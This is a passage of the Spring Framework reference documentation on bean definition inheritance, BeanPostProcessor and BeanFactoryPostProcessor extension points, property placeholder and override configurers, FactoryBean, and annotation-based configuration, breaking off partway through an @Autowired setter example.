Using parent and child bean definitions can save a lot\nof typing. Effectively, this is a form of templating.\n\nIf you work with an `ApplicationContext` interface programmatically, child bean\ndefinitions are represented by the `ChildBeanDefinition` class. Most users do not work\nwith them on this level, instead configuring bean definitions declaratively in something\nlike the `ClassPathXmlApplicationContext`. When you use XML-based configuration\nmetadata, you indicate a child bean definition by using the `parent` attribute,\nspecifying the parent bean as the value of this attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBean\" abstract=\"true\"\n\t\t\tclass=\"org.springframework.beans.TestBean\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithDifferentClass\"\n\t\t\tclass=\"org.springframework.beans.DerivedTestBean\"\n\t\t\t**parent=\"inheritedTestBean\"** init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- the age property value of 1 will be inherited from parent -->\n\t<\/bean>\n----\n\nA child bean definition uses the bean class from the parent definition if none is\nspecified, but can also override it. In the latter case, the child bean class must be\ncompatible with the parent, that is, it must accept the parent's property values.\n\nA child bean definition inherits scope, constructor argument values, property values, and\nmethod overrides from the parent, with the option to add new values. Any scope, initialization\nmethod, destroy method, and\/or `static` factory method settings that you specify will\noverride the corresponding parent settings.\n\nThe remaining settings are __always__ taken from the child definition: __depends on__,\n__autowire mode__, __dependency check__, __singleton__, __lazy init__.\n\nThe preceding example explicitly marks the parent bean definition as abstract by using\nthe `abstract` attribute. If the parent definition does not specify a class, explicitly\nmarking the parent bean definition as `abstract` is required, as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBeanWithoutClass\" abstract=\"true\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithClass\" class=\"org.springframework.beans.DerivedTestBean\"\n\t\t\tparent=\"inheritedTestBeanWithoutClass\" init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- age will inherit the value of 1 from the parent bean definition-->\n\t<\/bean>\n----\n\nThe parent bean cannot be instantiated on its own because it is incomplete, and it is\nalso explicitly marked as `abstract`. When a definition is `abstract` like this, it is\nusable only as a pure template bean definition that serves as a parent definition for\nchild definitions. Trying to use such an `abstract` parent bean on its own, by referring\nto it as a ref property of another bean or doing an explicit `getBean()` call with the\nparent bean id, returns an error. Similarly, the container's internal\n`preInstantiateSingletons()` method ignores bean definitions that are defined as\nabstract.\n\n[NOTE]\n====\n`ApplicationContext` pre-instantiates all singletons by default. 
Therefore, it is\nimportant (at least for singleton beans) that if you have a (parent) bean definition\nwhich you intend to use only as a template, and this definition specifies a class, you\nmust make sure to set the __abstract__ attribute to __true__, otherwise the application\ncontext will actually (attempt to) pre-instantiate the `abstract` bean.\n====\n\n\n\n\n[[beans-factory-extension]]\n== Container Extension Points\nTypically, an application developer does not need to subclass `ApplicationContext`\nimplementation classes. Instead, the Spring IoC container can be extended by plugging in\nimplementations of special integration interfaces. The next few sections describe these\nintegration interfaces.\n\n\n\n[[beans-factory-extension-bpp]]\n=== Customizing beans using a BeanPostProcessor\n\nThe `BeanPostProcessor` interface defines __callback methods__ that you can implement to\nprovide your own (or override the container's default) instantiation logic,\ndependency-resolution logic, and so forth. If you want to implement some custom logic\nafter the Spring container finishes instantiating, configuring, and initializing a bean,\nyou can plug in one or more `BeanPostProcessor` implementations.\n\nYou can configure multiple `BeanPostProcessor` instances, and you can control the order\nin which these ``BeanPostProcessor``s execute by setting the `order` property. You can\nset this property only if the `BeanPostProcessor` implements the `Ordered` interface; if\nyou write your own `BeanPostProcessor` you should consider implementing the `Ordered`\ninterface too. For further details, consult the javadocs of the `BeanPostProcessor` and\n`Ordered` interfaces. See also the note below on\n<<beans-factory-programmatically-registering-beanpostprocessors, programmatic\nregistration of ``BeanPostProcessor``s>>.\n\n[NOTE]\n====\n``BeanPostProcessor``s operate on bean (or object) __instances__; that is to say, the\nSpring IoC container instantiates a bean instance and __then__ ``BeanPostProcessor``s do\ntheir work.\n\n``BeanPostProcessor``s are scoped __per-container__. This is only relevant if you are\nusing container hierarchies. If you define a `BeanPostProcessor` in one container, it\nwill __only__ post-process the beans in that container. In other words, beans that are\ndefined in one container are not post-processed by a `BeanPostProcessor` defined in\nanother container, even if both containers are part of the same hierarchy.\n\nTo change the actual bean definition (i.e., the __blueprint__ that defines the bean),\nyou instead need to use a `BeanFactoryPostProcessor` as described in\n<<beans-factory-extension-factory-postprocessors>>.\n====\n\nThe `org.springframework.beans.factory.config.BeanPostProcessor` interface consists of\nexactly two callback methods. When such a class is registered as a post-processor with\nthe container, for each bean instance that is created by the container, the\npost-processor gets a callback from the container both __before__ container\ninitialization methods (such as InitializingBean's __afterPropertiesSet()__ and any\ndeclared init method) are called and __after__ any bean initialization callbacks.\nThe post-processor can take any action with the bean instance, including ignoring the\ncallback completely. A bean post-processor typically checks for callback interfaces or\nmay wrap a bean with a proxy. 
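\n\nAs an illustration of the proxy-wrapping case, the following is a minimal sketch of a\npost-processor that wraps beans of a given type in a JDK dynamic proxy that logs each\nmethod invocation; the `MyService` interface is a hypothetical example type, not part of\nthe Spring API.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport java.lang.reflect.InvocationHandler;\n\timport java.lang.reflect.Method;\n\timport java.lang.reflect.Proxy;\n\n\timport org.springframework.beans.BeansException;\n\timport org.springframework.beans.factory.config.BeanPostProcessor;\n\n\t\/\/ hypothetical example interface for the beans to be wrapped\n\tinterface MyService {\n\n\t\tvoid perform();\n\n\t}\n\n\tpublic class LoggingProxyBeanPostProcessor implements BeanPostProcessor {\n\n\t\tpublic Object postProcessBeforeInitialization(Object bean, String beanName)\n\t\t\t\tthrows BeansException {\n\t\t\treturn bean; \/\/ nothing to do before initialization\n\t\t}\n\n\t\tpublic Object postProcessAfterInitialization(Object bean, final String beanName)\n\t\t\t\tthrows BeansException {\n\t\t\tif (!(bean instanceof MyService)) {\n\t\t\t\treturn bean; \/\/ only wrap beans of the example type\n\t\t\t}\n\t\t\tfinal MyService target = (MyService) bean;\n\t\t\treturn Proxy.newProxyInstance(\n\t\t\t\t\ttarget.getClass().getClassLoader(),\n\t\t\t\t\tnew Class<?>[] {MyService.class},\n\t\t\t\t\tnew InvocationHandler() {\n\t\t\t\t\t\tpublic Object invoke(Object proxy, Method method, Object[] args) throws Throwable {\n\t\t\t\t\t\t\tSystem.out.println(\"Calling \" + method.getName() + \" on '\" + beanName + \"'\");\n\t\t\t\t\t\t\treturn method.invoke(target, args);\n\t\t\t\t\t\t}\n\t\t\t\t\t});\n\t\t}\n\n\t}\n----\n\n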
Some Spring AOP infrastructure classes are implemented as\nbean post-processors in order to provide proxy-wrapping logic.\n\nAn `ApplicationContext` __automatically detects__ any beans that are defined in the\nconfiguration metadata which implement the `BeanPostProcessor` interface. The\n`ApplicationContext` registers these beans as post-processors so that they can be called\nlater upon bean creation. Bean post-processors can be deployed in the container just\nlike any other beans.\n\nNote that when declaring a `BeanPostProcessor` using an `@Bean` factory method on a\nconfiguration class, the return type of the factory method should be the implementation\nclass itself or at least the `org.springframework.beans.factory.config.BeanPostProcessor`\ninterface, clearly indicating the post-processor nature of that bean. Otherwise, the\n`ApplicationContext` won't be able to autodetect it by type before fully creating it.\nSince a `BeanPostProcessor` needs to be instantiated early in order to apply to the\ninitialization of other beans in the context, this early type detection is critical.\n\n\n[[beans-factory-programmatically-registering-beanpostprocessors]]\n.Programmatically registering BeanPostProcessors\n[NOTE]\n====\nWhile the recommended approach for `BeanPostProcessor` registration is through\n`ApplicationContext` auto-detection (as described above), it is also possible to\nregister them __programmatically__ against a `ConfigurableBeanFactory` using the\n`addBeanPostProcessor` method. This can be useful when needing to evaluate conditional\nlogic before registration, or even for copying bean post processors across contexts in a\nhierarchy. Note however that ``BeanPostProcessor``s added programmatically __do not\nrespect the `Ordered` interface__. Here it is the __order of registration__ that\ndictates the order of execution. Note also that ``BeanPostProcessor``s registered\nprogrammatically are always processed before those registered through auto-detection,\nregardless of any explicit ordering.\n====
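\n\nThe following is a minimal sketch of such programmatic registration, assuming a\n`GenericApplicationContext` and a hypothetical `MyBeanPostProcessor` implementation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.support.GenericApplicationContext;\n\n\tpublic class Bootstrap {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tGenericApplicationContext ctx = new GenericApplicationContext();\n\t\t\t\/\/ load bean definitions into ctx here, e.g. with an XmlBeanDefinitionReader...\n\n\t\t\t\/\/ register the (hypothetical) post-processor before the context is refreshed\n\t\t\tctx.getBeanFactory().addBeanPostProcessor(new MyBeanPostProcessor());\n\n\t\t\tctx.refresh();\n\t\t}\n\n\t}\n----\n\n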
.BeanPostProcessors and AOP auto-proxying\n[NOTE]\n====\nClasses that implement the `BeanPostProcessor` interface are __special__ and are treated\ndifferently by the container. All ``BeanPostProcessor``s __and beans that they reference\ndirectly__ are instantiated on startup, as part of the special startup phase of the\n`ApplicationContext`. Next, all ``BeanPostProcessor``s are registered in a sorted fashion\nand applied to all further beans in the container. Because AOP auto-proxying is\nimplemented as a `BeanPostProcessor` itself, neither ``BeanPostProcessor``s nor the beans\nthey reference directly are eligible for auto-proxying, and thus do not have aspects\nwoven into them.\n\nFor any such bean, you should see an informational log message: \"__Bean foo is not\neligible for getting processed by all BeanPostProcessor interfaces (for example: not\neligible for auto-proxying)__\".\n\nNote that if you have beans wired into your `BeanPostProcessor` using autowiring or\n`@Resource` (which may fall back to autowiring), Spring might access unexpected beans\nwhen searching for type-matching dependency candidates, and therefore make them\nineligible for auto-proxying or other kinds of bean post-processing. For example, if you\nhave a dependency annotated with `@Resource` where the field\/setter name does not\ndirectly correspond to the declared name of a bean and no name attribute is used, then\nSpring will access other beans for matching them by type.\n====\n\nThe following examples show how to write, register, and use ``BeanPostProcessor``s in an\n`ApplicationContext`.\n\n\n[[beans-factory-extension-bpp-examples-hw]]\n==== Example: Hello World, BeanPostProcessor-style\n\nThis first example illustrates basic usage. The example shows a custom\n`BeanPostProcessor` implementation that invokes the `toString()` method of each bean as\nit is created by the container and prints the resulting string to the system console.\n\nThe following listing shows the custom `BeanPostProcessor` implementation class definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage scripting;\n\n\timport org.springframework.beans.factory.config.BeanPostProcessor;\n\timport org.springframework.beans.BeansException;\n\n\tpublic class InstantiationTracingBeanPostProcessor implements BeanPostProcessor {\n\n\t\t\/\/ simply return the instantiated bean as-is\n\t\tpublic Object postProcessBeforeInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\treturn bean; \/\/ we could potentially return any object reference here...\n\t\t}\n\n\t\tpublic Object postProcessAfterInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\tSystem.out.println(\"Bean '\" + beanName + \"' created : \" + bean.toString());\n\t\t\treturn bean;\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:lang=\"http:\/\/www.springframework.org\/schema\/lang\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\n\t\t\thttp:\/\/www.springframework.org\/schema\/lang\/spring-lang.xsd\">\n\n\t\t<lang:groovy id=\"messenger\"\n\t\t\t\tscript-source=\"classpath:org\/springframework\/scripting\/groovy\/Messenger.groovy\">\n\t\t\t<lang:property name=\"message\" value=\"Fiona Apple Is Just So Dreamy.\"\/>\n\t\t<\/lang:groovy>\n\n\t\t<!--\n\t\twhen the above bean (messenger) is instantiated, this custom\n\t\tBeanPostProcessor implementation will output the fact to the system console\n\t\t-->\n\t\t<bean class=\"scripting.InstantiationTracingBeanPostProcessor\"\/>\n\n\t<\/beans>\n----\n\nNotice how the `InstantiationTracingBeanPostProcessor` is simply defined. It does not\neven have a name, and because it is a bean it can be dependency-injected just like any\nother bean. (The preceding configuration also defines a bean that is backed by a Groovy\nscript. 
The Spring dynamic language support is detailed in the chapter entitled\n<<dynamic-language>>.)\n\nThe following simple Java application executes the preceding code and configuration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\timport org.springframework.scripting.Messenger;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\t\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"scripting\/beans.xml\");\n\t\t\tMessenger messenger = (Messenger) ctx.getBean(\"messenger\");\n\t\t\tSystem.out.println(messenger);\n\t\t}\n\n\t}\n----\n\nThe output of the preceding application resembles the following:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nBean 'messenger' created : org.springframework.scripting.groovy.GroovyMessenger@272961\norg.springframework.scripting.groovy.GroovyMessenger@272961\n----\n\n\n[[beans-factory-extension-bpp-examples-rabpp]]\n==== Example: The RequiredAnnotationBeanPostProcessor\n\nUsing callback interfaces or annotations in conjunction with a custom\n`BeanPostProcessor` implementation is a common means of extending the Spring IoC\ncontainer. An example is Spring's `RequiredAnnotationBeanPostProcessor` - a\n`BeanPostProcessor` implementation that ships with the Spring distribution which ensures\nthat JavaBean properties on beans that are marked with an (arbitrary) annotation are\nactually (configured to be) dependency-injected with a value.\n\n\n\n[[beans-factory-extension-factory-postprocessors]]\n=== Customizing configuration metadata with a BeanFactoryPostProcessor\n\nThe next extension point that we will look at is the\n`org.springframework.beans.factory.config.BeanFactoryPostProcessor`. The semantics of\nthis interface are similar to those of the `BeanPostProcessor`, with one major\ndifference: `BeanFactoryPostProcessor` operates on the __bean configuration metadata__;\nthat is, the Spring IoC container allows a `BeanFactoryPostProcessor` to read the\nconfiguration metadata and potentially change it __before__ the container instantiates\nany beans other than ``BeanFactoryPostProcessor``s.\n\nYou can configure multiple ``BeanFactoryPostProcessor``s, and you can control the order in\nwhich these ``BeanFactoryPostProcessor``s execute by setting the `order` property.\nHowever, you can only set this property if the `BeanFactoryPostProcessor` implements the\n`Ordered` interface. If you write your own `BeanFactoryPostProcessor`, you should\nconsider implementing the `Ordered` interface too. Consult the javadocs of the\n`BeanFactoryPostProcessor` and `Ordered` interfaces for more details.\n\n[NOTE]\n====\nIf you want to change the actual bean __instances__ (i.e., the objects that are created\nfrom the configuration metadata), then you instead need to use a `BeanPostProcessor`\n(described above in <<beans-factory-extension-bpp>>). While it is technically possible\nto work with bean instances within a `BeanFactoryPostProcessor` (e.g., using\n`BeanFactory.getBean()`), doing so causes premature bean instantiation, violating the\nstandard container lifecycle. This may cause negative side effects such as bypassing\nbean post processing.\n\nAlso, ``BeanFactoryPostProcessor``s are scoped __per-container__. This is only relevant if\nyou are using container hierarchies. 
If you define a `BeanFactoryPostProcessor` in one\ncontainer, it will __only__ be applied to the bean definitions in that container. Bean\ndefinitions in one container will not be post-processed by ``BeanFactoryPostProcessor``s\nin another container, even if both containers are part of the same hierarchy.\n====\n\nA bean factory post-processor is executed automatically when it is declared inside an\n`ApplicationContext`, in order to apply changes to the configuration metadata that\ndefine the container. Spring includes a number of predefined bean factory\npost-processors, such as `PropertyOverrideConfigurer` and\n`PropertyPlaceholderConfigurer`. A custom `BeanFactoryPostProcessor` can also be used,\nfor example, to register custom property editors.\n\nAn `ApplicationContext` automatically detects any beans that are deployed into it that\nimplement the `BeanFactoryPostProcessor` interface. It uses these beans as bean factory\npost-processors, at the appropriate time. You can deploy these post-processor beans as\nyou would any other bean.\n\n[NOTE]\n====\nAs with ``BeanPostProcessor``s, you typically do not want to configure\n``BeanFactoryPostProcessor``s for lazy initialization. If no other bean references a\n`Bean(Factory)PostProcessor`, that post-processor will not get instantiated at all.\nThus, marking it for lazy initialization will be ignored, and the\n`Bean(Factory)PostProcessor` will be instantiated eagerly even if you set the\n`default-lazy-init` attribute to `true` on the declaration of your `<beans \/>` element.\n====\n\n\n[[beans-factory-placeholderconfigurer]]\n==== Example: the Class name substitution PropertyPlaceholderConfigurer\n\nYou use the `PropertyPlaceholderConfigurer` to externalize property values from a bean\ndefinition in a separate file using the standard Java `Properties` format. Doing so\nenables the person deploying an application to customize environment-specific properties\nsuch as database URLs and passwords, without the complexity or risk of modifying the\nmain XML definition file or files for the container.\n\nConsider the following XML-based configuration metadata fragment, where a `DataSource`\nwith placeholder values is defined. The example shows properties configured from an\nexternal `Properties` file. At runtime, a `PropertyPlaceholderConfigurer` is applied to\nthe metadata that will replace some properties of the DataSource. 
The values to replace\nare specified as __placeholders__ of the form `${property-name}` which follows the Ant \/\nlog4j \/ JSP EL style.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\" value=\"classpath:com\/foo\/jdbc.properties\"\/>\n\t<\/bean>\n\n\t<bean id=\"dataSource\" destroy-method=\"close\"\n\t\t\tclass=\"org.apache.commons.dbcp.BasicDataSource\">\n\t\t<property name=\"driverClassName\" value=\"${jdbc.driverClassName}\"\/>\n\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t<\/bean>\n----\n\nThe actual values come from another file in the standard Java `Properties` format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.driverClassName=org.hsqldb.jdbcDriver\njdbc.url=jdbc:hsqldb:hsql:\/\/production:9002\njdbc.username=sa\njdbc.password=root\n----\n\nTherefore, the string `${jdbc.username}` is replaced at runtime with the value 'sa', and\nthe same applies for other placeholder values that match keys in the properties file.\nThe `PropertyPlaceholderConfigurer` checks for placeholders in most properties and\nattributes of a bean definition. Furthermore, the placeholder prefix and suffix can be\ncustomized.\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty placeholders with a dedicated configuration element. One or more locations can\nbe provided as a comma-separated list in the `location` attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-placeholder location=\"classpath:com\/foo\/jdbc.properties\"\/>\n----\n\nThe `PropertyPlaceholderConfigurer` does not look for properties only in the `Properties`\nfile you specify. By default, it also checks against the Java `System` properties if it\ncannot find a property in the specified properties files. You can customize this\nbehavior by setting the `systemPropertiesMode` property of the configurer with one of\nthe following three supported integer values:\n\n* __never__ (0): Never check system properties\n* __fallback__ (1): Check system properties if not resolvable in the specified\n properties files. This is the default.\n* __override__ (2): Check system properties first, before trying the specified\n properties files. This allows system properties to override any other property source.\n\nConsult the `PropertyPlaceholderConfigurer` javadocs for more information.\n\n[TIP]\n====\n\nYou can use the `PropertyPlaceholderConfigurer` to substitute class names, which is\nsometimes useful when you have to pick a particular implementation class at runtime. 
For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\t\t<property name=\"locations\">\n\t\t\t<value>classpath:com\/foo\/strategy.properties<\/value>\n\t\t<\/property>\n\t\t<property name=\"properties\">\n\t\t\t<value>custom.strategy.class=com.foo.DefaultStrategy<\/value>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"serviceStrategy\" class=\"${custom.strategy.class}\"\/>\n----\n\nIf the class cannot be resolved at runtime to a valid class, resolution of the bean\nfails when it is about to be created, which is during the `preInstantiateSingletons()`\nphase of an `ApplicationContext` for a non-lazy-init bean.\n====\n\n\n[[beans-factory-overrideconfigurer]]\n==== Example: the PropertyOverrideConfigurer\n\nThe `PropertyOverrideConfigurer`, another bean factory post-processor, resembles the\n`PropertyPlaceholderConfigurer`, but unlike the latter, the original definitions can\nhave default values or no values at all for bean properties. If an overriding\n`Properties` file does not have an entry for a certain bean property, the default\ncontext definition is used.\n\nNote that the bean definition is __not__ aware of being overridden, so it is not\nimmediately obvious from the XML definition file that the override configurer is being\nused. In case of multiple `PropertyOverrideConfigurer` instances that define different\nvalues for the same bean property, the last one wins, due to the overriding mechanism.\n\nProperties file configuration lines take this format:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nbeanName.property=value\n----\n\nFor example:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ndataSource.driverClassName=com.mysql.jdbc.Driver\ndataSource.url=jdbc:mysql:mydb\n----\n\nThis example file can be used with a container definition that contains a bean called\n__dataSource__, which has __driverClassName__ and __url__ properties.\n\nCompound property names are also supported, as long as every component of the path\nexcept the final property being overridden is already non-null (presumably initialized\nby the constructors). In this example...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nfoo.fred.bob.sammy=123\n----\n\n... the `sammy` property of the `bob` property of the `fred` property of the `foo` bean\nis set to the scalar value `123`.\n\n[NOTE]\n====\nSpecified override values are always __literal__ values; they are not translated into\nbean references. This convention also applies when the original value in the XML bean\ndefinition specifies a bean reference.\n====\n\nWith the `context` namespace introduced in Spring 2.5, it is possible to configure\nproperty overriding with a dedicated configuration element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context:property-override location=\"classpath:override.properties\"\/>\n----\n\n\n\n[[beans-factory-extension-factorybean]]\n=== Customizing instantiation logic with a FactoryBean\n\nImplement the `org.springframework.beans.factory.FactoryBean` interface for objects that\n__are themselves factories__.\n\nThe `FactoryBean` interface is a point of pluggability into the Spring IoC container's\ninstantiation logic. If you have complex initialization code that is better expressed in\nJava as opposed to a (potentially) verbose amount of XML, you can create your own\n`FactoryBean`, write the complex initialization inside that class, and then plug your\ncustom `FactoryBean` into the container.\n\nThe `FactoryBean` interface provides three methods:\n\n* `Object getObject()`: returns an instance of the object this factory creates. The\n instance can possibly be shared, depending on whether this factory returns singletons\n or prototypes.\n* `boolean isSingleton()`: returns `true` if this `FactoryBean` returns singletons,\n `false` otherwise.\n* `Class getObjectType()`: returns the object type returned by the `getObject()` method\n or `null` if the type is not known in advance.\n\nThe `FactoryBean` concept and interface are used in a number of places within the Spring\nFramework; more than 50 implementations of the `FactoryBean` interface ship with Spring\nitself.\n\nWhen you need to ask a container for an actual `FactoryBean` instance itself instead of\nthe bean it produces, preface the bean's id with the ampersand symbol (`&`) when\ncalling the `getBean()` method of the `ApplicationContext`. So for a given `FactoryBean`\nwith an id of `myBean`, invoking `getBean(\"myBean\")` on the container returns the\nproduct of the `FactoryBean`; whereas, invoking `getBean(\"&myBean\")` returns the\n`FactoryBean` instance itself.
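\n\nFor illustration, the following is a minimal sketch of a custom `FactoryBean`; the\n`MyTool` product class is a hypothetical example type.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.beans.factory.FactoryBean;\n\n\t\/\/ hypothetical product type created by the factory\n\tclass MyTool {\n\n\t}\n\n\tpublic class MyToolFactoryBean implements FactoryBean<MyTool> {\n\n\t\tpublic MyTool getObject() throws Exception {\n\t\t\t\/\/ complex construction logic, expressed in Java, goes here\n\t\t\treturn new MyTool();\n\t\t}\n\n\t\tpublic Class<?> getObjectType() {\n\t\t\treturn MyTool.class;\n\t\t}\n\n\t\tpublic boolean isSingleton() {\n\t\t\treturn true; \/\/ the container caches the single exposed instance\n\t\t}\n\n\t}\n----\n\nWith a `<bean id=\"myTool\" class=\"com.foo.MyToolFactoryBean\"\/>` definition (the package is\nan assumption for the example), `getBean(\"myTool\")` would then return the `MyTool` product,\nwhile `getBean(\"&myTool\")` would return the `MyToolFactoryBean` itself.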
\n\n\n[[beans-annotation-config]]\n== Annotation-based container configuration\n\n.Are annotations better than XML for configuring Spring?\n****\nThe introduction of annotation-based configurations raised the question of whether this\napproach is 'better' than XML. The short answer is __it depends__. The long answer is\nthat each approach has its pros and cons, and usually it is up to the developer to\ndecide which strategy suits them better. Due to the way they are defined, annotations\nprovide a lot of context in their declaration, leading to shorter and more concise\nconfiguration. However, XML excels at wiring up components without touching their source\ncode or recompiling them. Some developers prefer having the wiring close to the source\nwhile others argue that annotated classes are no longer POJOs and, furthermore, that the\nconfiguration becomes decentralized and harder to control.\n\nNo matter the choice, Spring can accommodate both styles and even mix them together.\nIt's worth pointing out that through its <<beans-java,JavaConfig>> option, Spring allows\nannotations to be used in a non-invasive way, without touching the target components'\nsource code and that in terms of tooling, all configuration styles are supported by the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite].\n****\n\nAn alternative to XML setups is provided by annotation-based configuration, which relies on\nthe bytecode metadata for wiring up components instead of angle-bracket declarations.\nInstead of using XML to describe a bean wiring, the developer moves the configuration\ninto the component class itself by using annotations on the relevant class, method, or\nfield declaration. As mentioned in <<beans-factory-extension-bpp-examples-rabpp>>, using\na `BeanPostProcessor` in conjunction with annotations is a common means of extending the\nSpring IoC container. For example, Spring 2.0 introduced the possibility of enforcing\nrequired properties with the <<beans-required-annotation,@Required>> annotation. Spring\n2.5 made it possible to follow that same general approach to drive Spring's dependency\ninjection. 
Essentially, the `@Autowired` annotation provides the same capabilities as\ndescribed in <<beans-factory-autowire>> but with more fine-grained control and wider\napplicability. Spring 2.5 also added support for JSR-250 annotations such as\n`@PostConstruct` and `@PreDestroy`. Spring 3.0 added support for JSR-330 (Dependency\nInjection for Java) annotations contained in the javax.inject package such as `@Inject`\nand `@Named`. Details about those annotations can be found in the\n<<beans-standard-annotations,relevant section>>.\n\n[NOTE]\n====\nAnnotation injection is performed __before__ XML injection, thus the latter\nconfiguration will override the former for properties wired through both approaches.\n====\n\nAs always, you can register them as individual bean definitions, but they can also be\nimplicitly registered by including the following tag in an XML-based Spring\nconfiguration (notice the inclusion of the `context` namespace):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t<\/beans>\n----\n\n(The implicitly registered post-processors include\n{api-spring-framework}\/beans\/factory\/annotation\/AutowiredAnnotationBeanPostProcessor.html[`AutowiredAnnotationBeanPostProcessor`],\n {api-spring-framework}\/context\/annotation\/CommonAnnotationBeanPostProcessor.html[`CommonAnnotationBeanPostProcessor`],\n {api-spring-framework}\/orm\/jpa\/support\/PersistenceAnnotationBeanPostProcessor.html[`PersistenceAnnotationBeanPostProcessor`],\nas well as the aforementioned\n{api-spring-framework}\/beans\/factory\/annotation\/RequiredAnnotationBeanPostProcessor.html[`RequiredAnnotationBeanPostProcessor`].)\n\n[NOTE]\n====\n`<context:annotation-config\/>` only looks for annotations on beans in the same\napplication context in which it is defined. This means that, if you put\n`<context:annotation-config\/>` in a `WebApplicationContext` for a `DispatcherServlet`,\nit only checks for `@Autowired` beans in your controllers, and not your services. See\n<<mvc-servlet>> for more information.\n====\n\n\n\n[[beans-required-annotation]]\n=== @Required\n\nThe `@Required` annotation applies to bean property setter methods, as in the following\nexample:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Required\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThis annotation simply indicates that the affected bean property must be populated at\nconfiguration time, through an explicit property value in a bean definition or through\nautowiring. The container throws an exception if the affected bean property has not been\npopulated; this allows for eager and explicit failure, avoiding ``NullPointerException``s\nor the like later on. It is still recommended that you put assertions into the bean\nclass itself, for example, into an init method. 
Doing so enforces those required\nreferences and values even when you use the class outside of a container.\n\n\n\n[[beans-autowired-annotation]]\n=== @Autowired\n\n[NOTE]\n====\nJSR 330's `@Inject` annotation can be used in place of Spring's `@Autowired` annotation\nin the examples below. See <<beans-standard-annotations,here>> for more details.\n====\n\nYou can apply the `@Autowired` annotation to constructors:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate final CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Autowired\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nAs of Spring Framework 4.3, the `@Autowired` constructor is no longer necessary if the\ntarget bean only defines one constructor. If several constructors are available, at\nleast one must be annotated to teach the container which one it has to use.\n====\n\nAs expected, you can also apply the `@Autowired` annotation to \"traditional\" setter\nmethods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic void 